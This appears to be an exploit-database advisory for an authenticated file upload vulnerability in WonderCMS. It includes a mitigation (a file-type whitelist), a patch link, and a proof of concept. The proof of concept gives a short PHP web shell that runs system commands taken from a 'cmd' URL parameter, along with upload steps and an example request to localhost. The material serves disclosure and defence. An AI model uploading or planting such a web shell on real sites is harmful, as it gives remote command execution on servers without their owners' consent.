WonderCMS File Upload Vulnerability

vendor:

WonderCMS

by:

Robiso

8.8

CVSS

HIGH

File Upload Vulnerability

434

CWE

Product Name: WonderCMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

WonderCMS File Upload Vulnerability

A vulnerability in WonderCMS allows an authenticated user to upload a malicious file with a php extension containing malicious code. This code can be executed by adding ?cmd= to the URL followed by a system command such as whoami,time,date etc. This vulnerability can be exploited by an authenticated user with low privileges.

Mitigation:

Create a whitelist of allowed filetypes.

Source

Exploit-DB raw data:

Affected Code:

public static function _uploadFile() { +
- if ( ! wCMS::$loggedIn && ! isset($_FILES['uploadFile']) && ! isset($_REQUEST['token'])) return; + private static function uploadFileAction()
- if (isset($_REQUEST['token']) && $_REQUEST['token'] == wCMS::_generateToken() && isset($_FILES['uploadFile'])) {


Proof of Concept
Steps to Reproduce:
 
1. Login with a valid credentials
2. Select Files option from the Settings menu of Content
3. Upload a file with php extension containing the below code:
 
           <?php
 
 $cmd=$_GET['cmd'];
 
 system($cmd);
 
 ?>
 
4. Click on Upload
5. Once the file is uploaded Click on the uploaded file and add ?cmd= to
the URL followed by a system command such as whoami,time,date etc.
Example:
http://localhost:8081/wondercms/files/shell.php?cmd=dir

Recommended Patch:

Create a whitelist of allowed filetypes.

The patch that addresses this bug is available here:

https://github.com/robiso/WonderCMS-testRepo/commit/8bd6cf9f3bf6a1d0123eb8b646584a63ee323c8a?diff=split

At line 742